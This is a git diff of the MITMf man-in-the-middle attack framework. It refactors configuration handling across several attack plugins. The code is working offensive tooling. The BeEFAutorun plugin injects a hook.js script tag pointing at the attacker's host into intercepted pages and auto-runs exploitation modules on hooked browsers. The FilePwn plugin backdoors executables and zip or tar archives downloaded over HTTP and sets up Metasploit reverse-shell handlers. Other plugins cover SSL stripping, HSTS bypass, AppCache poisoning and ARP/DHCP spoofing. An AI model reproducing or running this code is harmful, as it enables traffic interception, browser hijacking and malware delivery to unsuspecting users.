||||
████╗ ████║██║╚══██╔══╝████╗ ████║██╔════╝
|
||||
██╔████╔██║██║ ██║ ██╔████╔██║█████╗
|
||||
██║╚██╔╝██║██║ ██║ ██║╚██╔╝██║██╔══╝
|
||||
██║ ╚═╝ ██║██║ ██║ ██║ ╚═╝ ██║██║
|
||||
╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝
|
||||
"""
|
||||
|
||||
def printBanner(self):
|
||||
banners = [self.banner1, self.banner2, self.banner3, self.banner4]
|
||||
banners = [self.banner1, self.banner2, self.banner3, self.banner4, self.banner5]
|
||||
print random.choice(banners)
|
|
@ -1 +0,0 @@
|
|||
Subproject commit d24a8c2237eaae372e60a47f175694e8afa07c32
|
62
mitmf.py
62
mitmf.py
|
@ -28,21 +28,16 @@ from twisted.internet import reactor
|
|||
from core.sslstrip.CookieCleaner import CookieCleaner
|
||||
from core.sergioproxy.ProxyPlugins import ProxyPlugins
|
||||
from core.utils import Banners
|
||||
from core.utils import PrintException
|
||||
from configobj import ConfigObj
|
||||
|
||||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
|
||||
from scapy.all import get_if_addr, get_if_hwaddr
|
||||
from core.configwatcher import ConfigWatcher
|
||||
|
||||
from plugins import *
|
||||
plugin_classes = plugin.Plugin.__subclasses__()
|
||||
|
||||
try:
|
||||
import user_agents
|
||||
except ImportError:
|
||||
print "[-] user_agents library missing! User-Agent parsing will be disabled!"
|
||||
|
||||
mitmf_version = "0.9.6"
|
||||
mitmf_version = "0.9.6-dev"
|
||||
sslstrip_version = "0.9"
|
||||
sergio_version = "0.2.1"
|
||||
dnschef_version = "0.4"
|
||||
|
@ -75,6 +70,8 @@ sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a l
|
|||
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
|
||||
|
||||
#Initialize plugins
|
||||
plugin_classes = plugin.Plugin.__subclasses__()
|
||||
|
||||
plugins = []
|
||||
try:
|
||||
for p in plugin_classes:
|
||||
|
@ -99,37 +96,6 @@ except NotImplementedError:
|
|||
|
||||
args = parser.parse_args()
|
||||
|
||||
try:
|
||||
configfile = ConfigObj(args.configfile)
|
||||
except Exception, e:
|
||||
sys.exit("[-] Error parsing config file: {}".format(e))
|
||||
|
||||
config_args = configfile['MITMf']['args']
|
||||
if config_args:
|
||||
print "[*] Loading arguments from config file"
|
||||
for arg in config_args.split(' '):
|
||||
sys.argv.append(arg)
|
||||
args = parser.parse_args()
|
||||
|
||||
####################################################################################################
|
||||
|
||||
# Here we check for some variables that are very commonly used, and pass them down to the plugins
|
||||
try:
|
||||
args.ip_address = get_if_addr(args.interface)
|
||||
if (args.ip_address == "0.0.0.0") or (args.ip_address is None):
|
||||
sys.exit("[-] Interface {} does not have an assigned IP address".format(args.interface))
|
||||
except Exception, e:
|
||||
sys.exit("[-] Error retrieving interface IP address: {}".format(e))
|
||||
|
||||
try:
|
||||
args.mac_address = get_if_hwaddr(args.interface)
|
||||
except Exception, e:
|
||||
sys.exit("[-] Error retrieving interface MAC address: {}".format(e))
|
||||
|
||||
args.configfile = configfile #so we can pass the configobj down to all the plugins
|
||||
|
||||
####################################################################################################
|
||||
|
||||
log_level = logging.__dict__[args.log_level.upper()]
|
||||
|
||||
#Start logging
|
||||
|
@ -158,11 +124,9 @@ for p in plugins:
|
|||
print "| |_ {}".format(line)
|
||||
p.tree_output.remove(line)
|
||||
|
||||
if getattr(args, p.optname):
|
||||
p.initialize(args)
|
||||
load.append(p)
|
||||
|
||||
if vars(args)[p.optname] is True:
|
||||
if hasattr(p, 'tree_output') and p.tree_output:
|
||||
for line in p.tree_output:
|
||||
print "| |_ {}".format(line)
|
||||
|
@ -170,21 +134,15 @@ for p in plugins:
|
|||
#Plugins are ready to go, start MITMf
|
||||
if args.disproxy:
|
||||
ProxyPlugins.getInstance().setPlugins(load)
|
||||
DNSChef.getInstance().start()
|
||||
else:
|
||||
|
||||
from core.sslstrip.StrippingProxy import StrippingProxy
|
||||
from core.sslstrip.URLMonitor import URLMonitor
|
||||
from libs.dnschef.dnschef import DNSChef
|
||||
from core.dnschef.dnschef import DNSChef
|
||||
|
||||
URLMonitor.getInstance().setFaviconSpoofing(args.favicon)
|
||||
URLMonitor.getInstance().setResolver(args.configfile['MITMf']['DNS']['resolver'])
|
||||
URLMonitor.getInstance().setResolverPort(args.configfile['MITMf']['DNS']['port'])
|
||||
|
||||
DNSChef.getInstance().setCoreVars(args.configfile['MITMf']['DNS'])
|
||||
if args.configfile['MITMf']['DNS']['tcp'].lower() == 'on':
|
||||
DNSChef.getInstance().startTCP()
|
||||
else:
|
||||
DNSChef.getInstance().startUDP()
|
||||
DNSChef.getInstance().start()
|
||||
|
||||
CookieCleaner.getInstance().setEnabled(args.killsessions)
|
||||
ProxyPlugins.getInstance().setPlugins(load)
|
||||
|
@ -195,11 +153,13 @@ else:
|
|||
reactor.listenTCP(args.listen, strippingFactory)
|
||||
|
||||
#load custom reactor options for plugins that have the 'plugin_reactor' attribute
|
||||
for p in plugins:
|
||||
if getattr(args, p.optname):
|
||||
for p in load:
|
||||
if hasattr(p, 'plugin_reactor'):
|
||||
p.plugin_reactor(strippingFactory) #we pass the default strippingFactory, so the plugins can use it
|
||||
|
||||
if hasattr(p, 'startConfigWatch'):
|
||||
p.startConfigWatch()
|
||||
|
||||
print "|"
|
||||
print "|_ Sergio-Proxy v{} online".format(sergio_version)
|
||||
print "|_ SSLstrip v{} by Moxie Marlinspike online".format(sslstrip_version)
|
||||
|
|
|
@ -29,6 +29,7 @@ import sys
|
|||
from plugins.plugin import Plugin
|
||||
from datetime import date
|
||||
from core.sslstrip.URLMonitor import URLMonitor
|
||||
from core.configwatcher import ConfigWatcher
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
|
@ -47,18 +48,16 @@ class AppCachePlugin(Plugin):
|
|||
|
||||
self.urlMonitor.setAppCachePoisoning()
|
||||
|
||||
try:
|
||||
self.config = options.configfile['AppCachePoison']
|
||||
except Exception, e:
|
||||
sys.exit("[-] Error parsing config file for AppCachePoison: " + str(e))
|
||||
|
||||
def handleResponse(self, request, data):
|
||||
|
||||
self.config = ConfigWatcher.getInstance().getConfig()['AppCachePoison'] # so we reload the config on each request
|
||||
url = request.client.uri
|
||||
req_headers = request.client.getAllHeaders()
|
||||
headers = request.client.responseHeaders
|
||||
ip = request.client.getClientIP()
|
||||
|
||||
#########################################################################
|
||||
|
||||
if "enable_only_in_useragents" in self.config:
|
||||
regexp = self.config["enable_only_in_useragents"]
|
||||
if regexp and not re.search(regexp,req_headers["user-agent"]):
|
||||
|
|
|
@ -24,16 +24,15 @@ import json
|
|||
import threading
|
||||
|
||||
from core.beefapi.beefapi import BeefAPI
|
||||
from core.configwatcher import ConfigWatcher
|
||||
from core.utils import SystemConfig
|
||||
from plugins.plugin import Plugin
|
||||
from plugins.Inject import Inject
|
||||
from time import sleep
|
||||
|
||||
requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message
|
||||
requests_log.setLevel(logging.WARNING)
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class BeefAutorun(Inject, Plugin):
|
||||
class BeefAutorun(Inject, Plugin, ConfigWatcher):
|
||||
name = "BeEFAutorun"
|
||||
optname = "beefauto"
|
||||
desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type"
|
||||
|
@ -44,94 +43,89 @@ class BeefAutorun(Inject, Plugin):
|
|||
|
||||
def initialize(self, options):
|
||||
self.options = options
|
||||
self.ip_address = options.ip_address
|
||||
|
||||
try:
|
||||
beefconfig = options.configfile['MITMf']['BeEF']
|
||||
except Exception, e:
|
||||
sys.exit("[-] Error parsing BeEF options in config file: " + str(e))
|
||||
|
||||
try:
|
||||
userconfig = options.configfile['BeEFAutorun']
|
||||
except Exception, e:
|
||||
sys.exit("[-] Error parsing config for BeEFAutorun: " + str(e))
|
||||
|
||||
self.Mode = userconfig['mode']
|
||||
self.All_modules = userconfig["ALL"]
|
||||
self.Targeted_modules = userconfig["targets"]
|
||||
self.ip_address = SystemConfig.getIP(options.interface)
|
||||
|
||||
Inject.initialize(self, options)
|
||||
self.black_ips = []
|
||||
self.html_payload = '<script type="text/javascript" src="http://%s:%s/hook.js"></script>' % (self.ip_address, beefconfig['beefport'])
|
||||
|
||||
beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']})
|
||||
if not beef.login(beefconfig['user'], beefconfig['pass']):
|
||||
sys.exit("[-] Error logging in to BeEF!")
|
||||
self.onConfigChange()
|
||||
|
||||
self.tree_output.append("Mode: %s" % self.Mode)
|
||||
|
||||
t = threading.Thread(name="autorun", target=self.autorun, args=(beef,))
|
||||
t = threading.Thread(name="autorun", target=self.autorun, args=())
|
||||
t.setDaemon(True)
|
||||
t.start()
|
||||
|
||||
def autorun(self, beef):
|
||||
def onConfigChange(self):
|
||||
|
||||
beefconfig = self.config['MITMf']['BeEF']
|
||||
|
||||
self.html_payload = '<script type="text/javascript" src="http://{}:{}/hook.js"></script>'.format(self.ip_address, beefconfig['beefport'])
|
||||
|
||||
self.beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']})
|
||||
if not self.beef.login(beefconfig['user'], beefconfig['pass']):
|
||||
sys.exit("[-] Error logging in to BeEF!")
|
||||
|
||||
self.tree_output.append("Mode: {}".format(self.config['BeEFAutorun']['mode']))
|
||||
|
||||
def autorun(self):
|
||||
already_ran = []
|
||||
already_hooked = []
|
||||
|
||||
while True:
|
||||
sessions = beef.sessions_online()
|
||||
mode = self.config['BeEFAutorun']['mode']
|
||||
sessions = self.beef.sessions_online()
|
||||
if (sessions is not None and len(sessions) > 0):
|
||||
for session in sessions:
|
||||
|
||||
if session not in already_hooked:
|
||||
info = beef.hook_info(session)
|
||||
mitmf_logger.info("%s >> joined the horde! [id:%s, type:%s-%s, os:%s]" % (info['ip'], info['id'], info['name'], info['version'], info['os']))
|
||||
info = self.beef.hook_info(session)
|
||||
mitmf_logger.info("{} >> joined the horde! [id:{}, type:{}-{}, os:{}]".format(info['ip'], info['id'], info['name'], info['version'], info['os']))
|
||||
already_hooked.append(session)
|
||||
self.black_ips.append(str(info['ip']))
|
||||
|
||||
if self.Mode == 'oneshot':
|
||||
if mode == 'oneshot':
|
||||
if session not in already_ran:
|
||||
self.execModules(session, beef)
|
||||
self.execModules(session)
|
||||
already_ran.append(session)
|
||||
|
||||
elif self.Mode == 'loop':
|
||||
self.execModules(session, beef)
|
||||
elif mode == 'loop':
|
||||
self.execModules(session)
|
||||
sleep(10)
|
||||
|
||||
else:
|
||||
sleep(1)
|
||||
|
||||
def execModules(self, session, beef):
|
||||
session_info = beef.hook_info(session)
|
||||
def execModules(self, session):
|
||||
session_info = self.beef.hook_info(session)
|
||||
session_ip = session_info['ip']
|
||||
hook_browser = session_info['name']
|
||||
hook_os = session_info['os']
|
||||
all_modules = self.config['BeEFAutorun']["ALL"]
|
||||
targeted_modules = self.config['BeEFAutorun']["targets"]
|
||||
|
||||
if len(self.All_modules) > 0:
|
||||
mitmf_logger.info("%s >> sending generic modules" % session_ip)
|
||||
for module, options in self.All_modules.iteritems():
|
||||
mod_id = beef.module_id(module)
|
||||
resp = beef.module_run(session, mod_id, json.loads(options))
|
||||
if len(all_modules) > 0:
|
||||
mitmf_logger.info("{} >> sending generic modules".format(session_ip))
|
||||
for module, options in all_modules.iteritems():
|
||||
mod_id = self.beef.module_id(module)
|
||||
resp = self.beef.module_run(session, mod_id, json.loads(options))
|
||||
if resp["success"] == 'true':
|
||||
mitmf_logger.info('%s >> sent module %s' % (session_ip, mod_id))
|
||||
mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id))
|
||||
else:
|
||||
mitmf_logger.info('%s >> ERROR sending module %s' % (session_ip, mod_id))
|
||||
mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id))
|
||||
sleep(0.5)
|
||||
|
||||
mitmf_logger.info("%s >> sending targeted modules" % session_ip)
|
||||
for os in self.Targeted_modules:
|
||||
mitmf_logger.info("{} >> sending targeted modules".format(session_ip))
|
||||
for os in targeted_modules:
|
||||
if (os in hook_os) or (os == hook_os):
|
||||
browsers = self.Targeted_modules[os]
|
||||
browsers = targeted_modules[os]
|
||||
if len(browsers) > 0:
|
||||
for browser in browsers:
|
||||
if browser == hook_browser:
|
||||
modules = self.Targeted_modules[os][browser]
|
||||
modules = targeted_modules[os][browser]
|
||||
if len(modules) > 0:
|
||||
for module, options in modules.iteritems():
|
||||
mod_id = beef.module_id(module)
|
||||
resp = beef.module_run(session, mod_id, json.loads(options))
|
||||
mod_id = self.beef.module_id(module)
|
||||
resp = self.beef.module_run(session, mod_id, json.loads(options))
|
||||
if resp["success"] == 'true':
|
||||
mitmf_logger.info('%s >> sent module %s' % (session_ip, mod_id))
|
||||
mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id))
|
||||
else:
|
||||
mitmf_logger.info('%s >> ERROR sending module %s' % (session_ip, mod_id))
|
||||
mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id))
|
||||
sleep(0.5)
|
||||
|
|
|
@ -54,7 +54,7 @@ class BrowserProfiler(Inject, Plugin):
|
|||
if self.dic_output['plugin_list'] > 0:
|
||||
self.dic_output['plugin_list'] = self.dic_output['plugin_list'].split(',')
|
||||
pretty_output = pformat(self.dic_output)
|
||||
mitmf_logger.info("%s >> Browser Profiler data:\n%s" % (request.client.getClientIP(), pretty_output))
|
||||
mitmf_logger.info("{} >> Browser Profiler data:\n{}".format(request.client.getClientIP(), pretty_output))
|
||||
|
||||
def get_payload(self):
|
||||
payload = """<script type="text/javascript">
|
||||
|
|
|
@ -63,18 +63,20 @@ import random
|
|||
import string
|
||||
import tarfile
|
||||
import multiprocessing
|
||||
import threading
|
||||
|
||||
from libs.bdfactory import pebin
|
||||
from libs.bdfactory import elfbin
|
||||
from libs.bdfactory import machobin
|
||||
from core.msfrpc import Msfrpc
|
||||
from core.configwatcher import ConfigWatcher
|
||||
from plugins.plugin import Plugin
|
||||
from tempfile import mkstemp
|
||||
from configobj import ConfigObj
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class FilePwn(Plugin):
|
||||
class FilePwn(Plugin, ConfigWatcher):
|
||||
name = "FilePwn"
|
||||
optname = "filepwn"
|
||||
desc = "Backdoor executables being sent over http using bdfactory"
|
||||
|
@ -110,21 +112,8 @@ class FilePwn(Plugin):
|
|||
#NOT USED NOW
|
||||
#self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
|
||||
|
||||
#Metasploit options
|
||||
msfcfg = options.configfile['MITMf']['Metasploit']
|
||||
rpcip = msfcfg['rpcip']
|
||||
rpcpass = msfcfg['rpcpass']
|
||||
|
||||
try:
|
||||
self.msf = Msfrpc({"host": rpcip}) #create an instance of msfrpc libarary
|
||||
self.msf.login('msf', rpcpass)
|
||||
version = self.msf.call('core.version')['version']
|
||||
self.tree_output.append("Connected to Metasploit v%s" % version)
|
||||
except Exception:
|
||||
sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
|
||||
|
||||
#FilePwn options
|
||||
self.userConfig = options.configfile['FilePwn']
|
||||
self.userConfig = self.config['FilePwn']
|
||||
self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
|
||||
self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
|
||||
self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64']
|
||||
|
@ -138,9 +127,21 @@ class FilePwn(Plugin):
|
|||
self.zipblacklist = self.userConfig['ZIP']['blacklist']
|
||||
self.tarblacklist = self.userConfig['TAR']['blacklist']
|
||||
|
||||
self.tree_output.append("Setting up Metasploit payload handlers")
|
||||
#Metasploit options
|
||||
msfcfg = self.config['MITMf']['Metasploit']
|
||||
rpcip = msfcfg['rpcip']
|
||||
rpcpass = msfcfg['rpcpass']
|
||||
|
||||
jobs = self.msf.call('job.list')
|
||||
try:
|
||||
msf = Msfrpc({"host": rpcip}) #create an instance of msfrpc libarary
|
||||
msf.login('msf', rpcpass)
|
||||
version = msf.call('core.version')['version']
|
||||
self.tree_output.append("Connected to Metasploit v{}".format(version))
|
||||
except Exception:
|
||||
sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
|
||||
|
||||
self.tree_output.append("Setting up Metasploit payload handlers")
|
||||
jobs = msf.call('job.list')
|
||||
for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]:
|
||||
cmd = "use exploit/multi/handler\n"
|
||||
cmd += "set payload {}\n".format(config["MSFPAYLOAD"])
|
||||
|
@ -150,19 +151,22 @@ class FilePwn(Plugin):
|
|||
|
||||
if jobs:
|
||||
for pid, name in jobs.iteritems():
|
||||
info = self.msf.call('job.info', [pid])
|
||||
info = msf.call('job.info', [pid])
|
||||
if (info['name'] != "Exploit: multi/handler") or (info['datastore']['payload'] != config["MSFPAYLOAD"]) or (info['datastore']['LPORT'] != config["PORT"]) or (info['datastore']['lhost'] != config['HOST']):
|
||||
#Create a virtual console
|
||||
c_id = self.msf.call('console.create')['id']
|
||||
c_id = msf.call('console.create')['id']
|
||||
|
||||
#write the cmd to the newly created console
|
||||
self.msf.call('console.write', [c_id, cmd])
|
||||
msf.call('console.write', [c_id, cmd])
|
||||
else:
|
||||
#Create a virtual console
|
||||
c_id = self.msf.call('console.create')['id']
|
||||
c_id = msf.call('console.create')['id']
|
||||
|
||||
#write the cmd to the newly created console
|
||||
self.msf.call('console.write', [c_id, cmd])
|
||||
msf.call('console.write', [c_id, cmd])
|
||||
|
||||
def onConfigChange(self):
|
||||
self.initialize(self.options)
|
||||
|
||||
def convert_to_Bool(self, aString):
|
||||
if aString.lower() == 'true':
|
||||
|
@ -351,7 +355,7 @@ class FilePwn(Plugin):
|
|||
|
||||
if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']):
|
||||
print "[!] TarFile over allowed size"
|
||||
mitmf_logger.info("TarFIle maxSize met %s", len(aTarFileBytes))
|
||||
mitmf_logger.info("TarFIle maxSize met {}".format(len(aTarFileBytes)))
|
||||
self.patched.put(aTarFileBytes)
|
||||
return
|
||||
|
||||
|
@ -423,7 +427,7 @@ class FilePwn(Plugin):
|
|||
|
||||
if keywordCheck is True:
|
||||
print "[!] Tar blacklist enforced!"
|
||||
mitmf_logger.info('Tar blacklist enforced on %s', info.name)
|
||||
mitmf_logger.info('Tar blacklist enforced on {}'.format(info.name))
|
||||
continue
|
||||
|
||||
# Try to patch
|
||||
|
@ -444,14 +448,14 @@ class FilePwn(Plugin):
|
|||
info.size = os.stat(file2).st_size
|
||||
with open(file2, 'rb') as f:
|
||||
newTarFile.addfile(info, f)
|
||||
mitmf_logger.info("%s in tar patched, adding to tarfile", info.name)
|
||||
mitmf_logger.info("{} in tar patched, adding to tarfile".format(info.name))
|
||||
os.remove(file2)
|
||||
wasPatched = True
|
||||
else:
|
||||
print "[!] Patching failed"
|
||||
with open(tmp.name, 'rb') as f:
|
||||
newTarFile.addfile(info, f)
|
||||
mitmf_logger.info("%s patching failed. Keeping original file in tar.", info.name)
|
||||
mitmf_logger.info("{} patching failed. Keeping original file in tar.".format(info.name))
|
||||
if patchCount == int(self.userConfig['TAR']['patchCount']):
|
||||
mitmf_logger.info("Met Tar config patchCount limit.")
|
||||
|
||||
|
@ -479,7 +483,7 @@ class FilePwn(Plugin):
|
|||
|
||||
if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
|
||||
print "[!] ZipFile over allowed size"
|
||||
mitmf_logger.info("ZipFIle maxSize met %s", len(aZipFile))
|
||||
mitmf_logger.info("ZipFIle maxSize met {}".format(len(aZipFile)))
|
||||
self.patched.put(aZipFile)
|
||||
return
|
||||
|
||||
|
@ -536,7 +540,7 @@ class FilePwn(Plugin):
|
|||
|
||||
if keywordCheck is True:
|
||||
print "[!] Zip blacklist enforced!"
|
||||
mitmf_logger.info('Zip blacklist enforced on %s', info.filename)
|
||||
mitmf_logger.info('Zip blacklist enforced on {}'.format(info.filename))
|
||||
continue
|
||||
|
||||
patchResult = self.binaryGrinder(tmpDir + '/' + info.filename)
|
||||
|
@ -546,12 +550,12 @@ class FilePwn(Plugin):
|
|||
file2 = "backdoored/" + os.path.basename(info.filename)
|
||||
print "[*] Patching complete, adding to zip file."
|
||||
shutil.copyfile(file2, tmpDir + '/' + info.filename)
|
||||
mitmf_logger.info("%s in zip patched, adding to zipfile", info.filename)
|
||||
mitmf_logger.info("{} in zip patched, adding to zipfile".format(info.filename))
|
||||
os.remove(file2)
|
||||
wasPatched = True
|
||||
else:
|
||||
print "[!] Patching failed"
|
||||
mitmf_logger.info("%s patching failed. Keeping original file in zip.", info.filename)
|
||||
mitmf_logger.info("{} patching failed. Keeping original file in zip.".format(info.filename))
|
||||
|
||||
print '-' * 10
|
||||
|
||||
|
@ -595,7 +599,7 @@ class FilePwn(Plugin):
|
|||
if content_header in self.zipMimeTypes:
|
||||
|
||||
if self.bytes_have_format(data, 'zip'):
|
||||
mitmf_logger.info("%s Detected supported zip file type!" % client_ip)
|
||||
mitmf_logger.info("{} Detected supported zip file type!".format(client_ip))
|
||||
|
||||
process = multiprocessing.Process(name='zip', target=self.zip, args=(data,))
|
||||
process.daemon = True
|
||||
|
@ -604,13 +608,13 @@ class FilePwn(Plugin):
|
|||
bd_zip = self.patched.get()
|
||||
|
||||
if bd_zip:
|
||||
mitmf_logger.info("%s Patching complete, forwarding to client" % client_ip)
|
||||
mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip))
|
||||
return {'request': request, 'data': bd_zip}
|
||||
|
||||
else:
|
||||
for tartype in ['gz','bz','tar']:
|
||||
if self.bytes_have_format(data, tartype):
|
||||
mitmf_logger.info("%s Detected supported tar file type!" % client_ip)
|
||||
mitmf_logger.info("{} Detected supported tar file type!".format(client_ip))
|
||||
|
||||
process = multiprocessing.Process(name='tar_files', target=self.tar_files, args=(data,))
|
||||
process.daemon = True
|
||||
|
@ -619,14 +623,14 @@ class FilePwn(Plugin):
|
|||
bd_tar = self.patched.get()
|
||||
|
||||
if bd_tar:
|
||||
mitmf_logger.info("%s Patching complete, forwarding to client" % client_ip)
|
||||
mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip))
|
||||
return {'request': request, 'data': bd_tar}
|
||||
|
||||
|
||||
elif content_header in self.binaryMimeTypes:
|
||||
for bintype in ['pe','elf','fatfile','machox64','machox86']:
|
||||
if self.bytes_have_format(data, bintype):
|
||||
mitmf_logger.info("%s Detected supported binary type!" % client_ip)
|
||||
mitmf_logger.info("{} Detected supported binary type!".format(client_ip))
|
||||
fd, tmpFile = mkstemp()
|
||||
with open(tmpFile, 'w') as f:
|
||||
f.write(data)
|
||||
|
@ -640,9 +644,9 @@ class FilePwn(Plugin):
|
|||
if patchb:
|
||||
bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read()
|
||||
os.remove('./backdoored/' + os.path.basename(tmpFile))
|
||||
mitmf_logger.info("%s Patching complete, forwarding to client" % client_ip)
|
||||
mitmf_logger.info("{} Patching complete, forwarding to client".format(client_ip))
|
||||
return {'request': request, 'data': bd_binary}
|
||||
|
||||
else:
|
||||
mitmf_logger.debug("%s File is not of supported Content-Type: %s" % (client_ip, content_header))
|
||||
mitmf_logger.debug("{} File is not of supported Content-Type: {}".format(client_ip, content_header))
|
||||
return {'request': request, 'data': data}
|
|
@ -19,12 +19,15 @@
|
|||
#
|
||||
|
||||
import logging
|
||||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
|
||||
from scapy.all import get_if_addr
|
||||
import time
|
||||
import re
|
||||
import sys
|
||||
import argparse
|
||||
|
||||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
|
||||
from scapy.all import get_if_addr
|
||||
|
||||
from core.utils import SystemConfig
|
||||
from plugins.plugin import Plugin
|
||||
from plugins.CacheKill import CacheKill
|
||||
|
||||
|
@ -42,7 +45,7 @@ class Inject(CacheKill, Plugin):
|
|||
def initialize(self, options):
|
||||
'''Called if plugin is enabled, passed the options namespace'''
|
||||
self.options = options
|
||||
self.proxyip = options.ip_address
|
||||
self.proxyip = SystemConfig.getIP(options.interface)
|
||||
self.html_src = options.html_url
|
||||
self.js_src = options.js_url
|
||||
self.rate_limit = options.rate_limit
|
||||
|
|
|
@ -24,7 +24,7 @@ import logging
|
|||
from plugins.plugin import Plugin
|
||||
from core.utils import IpTables
|
||||
from core.sslstrip.URLMonitor import URLMonitor
|
||||
from libs.dnschef.dnschef import DNSChef
|
||||
from core.dnschef.dnschef import DNSChef
|
||||
|
||||
class HSTSbypass(Plugin):
|
||||
name = 'SSLstrip+'
|
||||
|
|
|
@ -25,7 +25,7 @@ from core.utils import SystemConfig, IpTables
|
|||
from core.sslstrip.DnsCache import DnsCache
|
||||
from core.wrappers.protocols import _ARP, _DHCP, _ICMP
|
||||
from plugins.plugin import Plugin
|
||||
from libs.dnschef.dnschef import DNSChef
|
||||
from core.dnschef.dnschef import DNSChef
|
||||
|
||||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
|
||||
from scapy.all import *
|
||||
|
|
|
@ -11,10 +11,6 @@ class Plugin(object):
|
|||
implements = []
|
||||
has_opts = False
|
||||
|
||||
def __init__(self):
|
||||
'''Called on plugin instantiation. Probably don't need this'''
|
||||
pass
|
||||
|
||||
def initialize(self, options):
|
||||
'''Called if plugin is enabled, passed the options namespace'''
|
||||
self.options = options
|
||||
|
|
|
@ -13,5 +13,6 @@ pefile
|
|||
ipy
|
||||
pyopenssl
|
||||
service_identity
|
||||
watchdog
|
||||
capstone
|
||||
pypcap
|
||||
|
|
Loading…
Add table
Add a link
Reference in a new issue